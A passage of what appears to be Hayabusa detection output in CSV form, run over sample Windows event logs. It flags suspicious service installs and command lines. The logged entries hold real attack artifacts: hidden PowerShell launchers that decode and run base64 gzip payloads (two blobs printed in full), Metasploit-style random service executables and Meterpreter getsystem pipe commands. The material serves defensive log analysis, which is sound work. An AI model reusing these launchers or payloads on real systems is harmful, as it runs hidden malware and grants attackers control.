HHou2ej34qPvrpttduXZvdNXfdLaPsN9AVYfvEvWAfDIu89Zm9f7uy3ZyIonXLvs2DqM5ZiAVuMDTeq3ysH
q8jrucJhGyvG/OSxL6hEFHg56X6h0xxq2kL+wvbuhJh04xg5IdwPCy+OJIkb47Ks+tIn11czMBlFBAJ/rOt4jvinlO21xqGlz92qakwZl//YAGD7by6Yq5pIOc8vW3Ddl+QyUpuExgfcBGfL34fyk9lvocfux/o/T53T9Yf4lmLfcDCT9Zf3zxW5z/NgMjTAV4mnBXMXJoni8TcZTRyWdGmiJQiHN8ko++u1hcdOAL5C8TptLHZwoAAA=='));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd(); | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc10 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 05:38:04.034 +09:00,IE10Win7,7045,high,Persis,Suspicious Service Installed,"Svc: DrzkXznQhkKgYssd | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 05:38:04.034 +09:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,"Svc: DrzkXznQhkKgYssd | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object 
System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 05:38:04.034 +09:00,IE10Win7,7045,info,Persis,Service Installed,"Name: DrzkXznQhkKgYssd | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 05:38:04.041 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object 
System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Path: C:\Windows\System32\cmd.exe | PID: 0xc40 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 05:38:04.087 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object 
IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAKtM4FcCA71WbW/aSBD+3Er9D1aFhK0SDIQmTaRKt8YYCC8BHMxb0Wljr+2FxUvsdXjp9b/fGHBCrs0p1w9nJWLXM7P77DPP7NiNA1tQHkjr7Xy3qDfHSPr+4f27Lg7xUpIzD3VrxLSclFkX726swVp59w6sGda0R60/g60ufZXkKVqtdL7ENJhdX1fiMCSBOMzzNSJQFJHlPaMkkhXpL2nok5Cc3d7PiS2k71Lmz3yN8XvMjm7bCrZ9Ip2hwElsLW7jBF3eXDEq5Oy3b1llelac5asPMWaRnDW3kSDLvMNYVpF+KMmGd9sVkbNtaoc84q7ID2lwXsoPggi7pAOrPZI2ET53oqwCR4G/kIg4DKTnQyWrHHzkLAy7IbeR44QkgpB8I3jkCyJngpixnPSHPD1C6MeBoEsCdkFCvjJJ+EhtEuXrOHAY6RN3JnfIOj35W4Pk0yDw6opQyUFeXsPa5k7MyCE8q/yM9phQBZ6TpAIRPz68//DeTcUQ+3HR76L+qRZg9G66HxMAK3d5RPe+X6VCTmrDjljwcAvTzF0YE2UmTZNMTGczKYMnZu718GLqC56udlmDV1OLU2cGIccUZSK/tlt8CTbuTTUxv644nbg0IPo2wEtqp6KSf0U9cRnZnzafunUAm5w9GoijE0Y8LBIec9L057DqkoqnWC2mzCEhsiF9EaCCzCovwRxSI2cbQZssganDPAtpcEHKJPU+yneb7p7MwSlbYTiKclI3hlqyc5JJMCNOTkJBRI8mFAu+H2af4bZjJqiNI5EuN1P+Qedx2woPIhHGNuQQKLgzV8SmmCWM5KQ6dYi2NamXbp/9JR8VzBgNPFjpEfIBbxIeTJEoIwSkiQqUvElEY7liZAku+9I2GPagkI+VsFcS9oiTfQVnqvWDsBNiUkZOUEK2TcZFTrJoKOCi2JMMyvotECc3xCmcSkiO2ZHT8plqW5EIPvNwEbkjY3PbTbR6JGpPSyiAEiPkSw1H5KJsihAIkz+qt7SC4Bk3Ata2tQUtojUtNtrwP6DnDa5fOs2beV0N9Y3vokbUaNe7eq9eLz/emFZZmNWGaHYbol0dzecmqvcHYzFpoPodLSzG5d3qhu7MFnLGG/Vip+3WBW2zm3uOO9Zd17t0zX7xs0Fbw0pPK5RwS6/GraG21grlqErX9R4d9BY3hrgfWwwPXNUbFa8w3bTCuVXk7V0DoZp/bu9uXKvmt53tuK5eDcsLVEWoElQtQ+PNsRairmphz+Lr5rzGhl4FaYZNyaQ3MLRez9DQoDZ/0K9UD2JH2NeGVolOVqO+D3MDIDTVQrnhkB0f94CkGkfY64OPVynZvgs++iekferwqIQXGkca+BiTB8A1XhldBva7QYkji3VGGLUmW0NVi+NuGdULdFjzULIk9rQeRtGjvtPVouVwZ/i5M3ZVuCkvVb1yt7JdVVXXdb1pT4qbL7eXZa3wUFnSJbsvOerV4IsWrJte99FzesPL/qazvYf9BqpqfUz0AwLKiF2r3LjCV1E1PJHEa7d/G4eRjxlIBW70tHANHhrH67nLaRIhy889e0HCgDDoc9AJU9UjxriddIun2xy61aGHzKCABzA8L/1ypEhPjspzE0lfXV9PAC7U0pPM8y0SeMLPFTbnhQJ0g8KmXICjv/2cFb7ays/r5ZKWckrai83YfjMlqbgM3/Xsi0t+rv8PtB4r3ocf5y20Pr/7F+ubqC7kXpDxk/Xli//E/O9RMcRUgLsJtxcjh776OiNHTZ18jTxlDRTjHp/k4/A2Fmcd+FL5G8KtLTuVCgAA''));IEX (New-Object IO.StreamReader(New-Object 
IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe64 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 05:38:04.643 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""powershell.exe"" -nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String('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'));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd(); | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xa3c | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 05:59:41.659 +09:00,IE10Win7,7045,high,Persis,Suspicious Service Installed,"Svc: TDhDnlnsrKrQVnjY | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Account: LocalSystem | 
Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 05:59:41.659 +09:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,"Svc: TDhDnlnsrKrQVnjY | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 05:59:41.659 +09:00,IE10Win7,7045,info,Persis,Service Installed,"Name: TDhDnlnsrKrQVnjY | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Account: LocalSystem | Start Type: demand 
start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 05:59:41.676 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIALxR4FcCA7VWf2/aSBD9O5X6HawKCVslGAhpmkiVbo0xEDABHCCGotPGXpuFxUvs5Wev3/3GYDdUTar0pLMSseuZ2X375s2OvVXgCMoDaYltQ/r2/t1ZB4d4IckZl667NmZ2Tsp4wa7aLClnZ2DOrM1OoNXYcqTXpC+SPEbLpc4XmAaTm5vKKgxJII7zfI0IFEVk8cgoiWRF+kcaTklIzu8eZ8QR0jcp83e+xvgjZonbroKdKZHOUeDGthZ3cIwtby0ZFXL269esMj4vTvLVpxVmkZy1dpEgi7zLWFaRvivxhve7JZGzJnVCHnFP5Ic0uCjl+0GEPdKG1dbEJGLK3SirwGHgLyRiFQbS6bHidY5echaGnZA7yHVDEkFQvhGs+ZzImWDFWE76Sx4nIHqrQNAFAbsgIV9aJFxTh0T5Og5cRnrEm8htsknP/tYg+TQIvDoiVHKQnNfRmtxdMXJcIKv8ivdHXhV4nnMLbHx//+79Oy/VQ3TZs4K/69v1qShgdDY+jAkAljs8ogfnL1IhJ5mwJxY83ME0cx+uiDKRxnE+xpOJlGHuZTn3enwxdQbXPbl4uIR34wGn7gRiklRlvO4wWG/KmMbG13WnE48GRN8FeEGdVFryS/QTj5HDcfOpWxugydnEQFydMOJjETOZk8a/hlUXVPyI1VaUuSREDqQwAlSQXeVnMMfkyNlGYJIFMHWcZ+M0gKBJ6p2IeJfuHs/BKVthOIpyUmcFFeXkJItgRtychIKIJia0EvwwzD7DNVdMUAdHIl1uovxEZrJphQeRCFcOZBAIuLeWxKGYxXzkpDp1ibazqJ9unn2RjQpmjAY+rLSGbMCbmAVLxLoIAedBA0reIqKxWDKyAJ9DfRsM+1DNSTEchIR94mZfhJlK/ajrmJWUjhOQkGqLcZGTBjQUcFfEDB9U9d9AnFwTz3AqIUlSI6fFM9Z2IlZ7ZtrdOsOeE8s0YenASSiADyPkCw1H5FPZEiGwJX9Q72gFwWM3AmY62pwW0YYWGyb89+lFg+tXbvN2VldDfTv1UCNqmPWO3q3Xy+tba1AWVrUhmp2GMKsPs5mF6r2+LUYNVL+nhbld3i9v6d5qIdfeqp/22n5T0Lb7me96tu55/pVn9YqXBm0NK12tUMItvbpqDbWNVihHVbqpd2m/O781xKM9YLjvqf5D8RrTbSucDYrc3DcQqk0vnP2tN6hNTXdn19XrYXmOqghVgurA0HjT1kLUUQfYH/BNc1ZjQ7+CNMOhZNTtG1q3a2ioX5s96deqD7EPeKoNByU6Wj70pjA3AEJTLZQbLtlzuwsk1TjCfg98/ErJmXrgo39E2sc2j0p4rnGkgY8xegJc9tLoMLDf90scDVj7AaPWaGeoatHulFG9QIc1H8VLYl/
rYhSt9b2uFgcud4eXbdtTBw/sStUr90vHU1V1U9ebzqi4/Xx3VdYKT5UFXbDHkqte9z9rwabpd9a+2x1e9bbt3SPs11fVwYdYOyCezGJ2vTSvTtTw2r1v4jCaYgYqgZs8LVeDh0ZyK3c4jSNk+dCt5yQMCIP2Bg0wVTpijDtxi3i+v6FHHTvHBIq2D8OL0osjRfrhqDw3jvTVzc0IoEL9JNrOt0jgi2musL0oFOD2L2zLBTjv209Y4cudnK6WixtIwtPJHuywhxLXVsaf96In1Pp/WUyKego/7ptYfH73G+ubmC3k0vP/Yvj5xR+x/McMDDEV4GnBzcTIsV3+hohEOSffGUmaQBde8sQffncrcd6GL5B/AQG25GNvCgAA''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Path: C:\Windows\System32\cmd.exe | PID: 0xe28 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 05:59:41.680 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xd2c | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 05:59:41.854 
+09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""powershell.exe"" -nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String('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'));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd(); | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc00 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 06:00:23.453 +09:00,IE10Win7,7045,medium,Persis,Possible Metasploit Service Installed,Svc: QPFRRKggYorFrGnJ | Path: %SYSTEMROOT%\OJuUfMOy.exe,../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MetasploitService.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 06:00:23.453 +09:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,Svc: QPFRRKggYorFrGnJ | Path: %SYSTEMROOT%\OJuUfMOy.exe,../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 06:00:23.453 +09:00,IE10Win7,7045,info,Persis,Service Installed,Name: QPFRRKggYorFrGnJ | Path: %SYSTEMROOT%\OJuUfMOy.exe | Account: LocalSystem | Start Type: demand start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 06:00:33.473 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" SpyNetService -RestrictPrivileges -AccessKey CC5A59EB-39B8-70D1-D323-21B5170E809F | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xb1c | User: IE10WIN7$ | LID: 
0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 06:00:33.590 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" SpyNetService -RestrictPrivileges -AccessKey CC5A59EB-39B8-70D1-D323-21B5170E809F -Reinvoke | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xd30 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 06:08:05.647 +09:00,IE10Win7,7045,medium,Persis,Possible Metasploit Service Installed,Svc: KAyUYDrNOKClCGXL | Path: %SYSTEMROOT%\BRMPXyFc.exe,../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MetasploitService.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 06:08:05.647 +09:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,Svc: KAyUYDrNOKClCGXL | Path: %SYSTEMROOT%\BRMPXyFc.exe,../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 06:08:05.647 +09:00,IE10Win7,7045,info,Persis,Service Installed,Name: KAyUYDrNOKClCGXL | Path: %SYSTEMROOT%\BRMPXyFc.exe | Account: LocalSystem | Start Type: demand start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 06:12:10.677 +09:00,IE10Win7,7045,high,Persis,Suspicious Service Installed,Svc: adsymn | Path: cmd.exe /c echo adsymn > \\.\pipe\adsymn | Account: LocalSystem | Start Type: demand start,../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 06:12:10.677 
+09:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,Svc: adsymn | Path: cmd.exe /c echo adsymn > \\.\pipe\adsymn,../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 06:12:10.677 +09:00,IE10Win7,7045,info,Persis,Service Installed,Name: adsymn | Path: cmd.exe /c echo adsymn > \\.\pipe\adsymn | Account: LocalSystem | Start Type: demand start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 06:12:10.682 +09:00,IE10Win7,4688,medium,,Suspicious Cmd Line_Possible Meterpreter getsystem,Cmd Line: cmd.exe /c echo adsymn > \\.\pipe\adsymn | Path: C:\Windows\System32\cmd.exe | PID: 0x3dc | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_MeterpreterGetSystem.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 06:12:10.682 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: cmd.exe /c echo adsymn > \\.\pipe\adsymn | Path: C:\Windows\System32\cmd.exe | PID: 0x3dc | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 06:12:45.349 +09:00,IE10Win7,7045,medium,Persis,Possible Metasploit Service Installed,Svc: xnQMIQKvTLVeKYjo | Path: %SYSTEMROOT%\LCCxAHbh.exe,../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MetasploitService.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 06:12:45.349 +09:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,Svc: xnQMIQKvTLVeKYjo | Path: 
%SYSTEMROOT%\LCCxAHbh.exe,../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 06:12:45.349 +09:00,IE10Win7,7045,info,Persis,Service Installed,Name: xnQMIQKvTLVeKYjo | Path: %SYSTEMROOT%\LCCxAHbh.exe | Account: LocalSystem | Start Type: demand start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 06:13:04.090 +09:00,IE10Win7,7045,high,Persis,Suspicious Service Installed,Svc: hmoopk | Path: cmd.exe /c echo hmoopk > \\.\pipe\hmoopk | Account: LocalSystem | Start Type: demand start,../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 06:13:04.090 +09:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,Svc: hmoopk | Path: cmd.exe /c echo hmoopk > \\.\pipe\hmoopk,../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 06:13:04.090 +09:00,IE10Win7,7045,info,Persis,Service Installed,Name: hmoopk | Path: cmd.exe /c echo hmoopk > \\.\pipe\hmoopk | Account: LocalSystem | Start Type: demand start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 06:13:04.094 +09:00,IE10Win7,4688,medium,,Suspicious Cmd Line_Possible Meterpreter getsystem,Cmd Line: cmd.exe /c echo hmoopk > \\.\pipe\hmoopk | Path: C:\Windows\System32\cmd.exe | PID: 0xc10 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_MeterpreterGetSystem.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 06:13:04.094 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: 
cmd.exe /c echo hmoopk > \\.\pipe\hmoopk | Path: C:\Windows\System32\cmd.exe | PID: 0xc10 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 06:23:37.125 +09:00,IE10Win7,7045,high,Persis,Suspicious Service Installed,"Svc: aCshIvAdgRYNApEv | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 06:23:37.125 +09:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,"Svc: aCshIvAdgRYNApEv | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''));IEX (New-Object IO.StreamReader(New-Object 
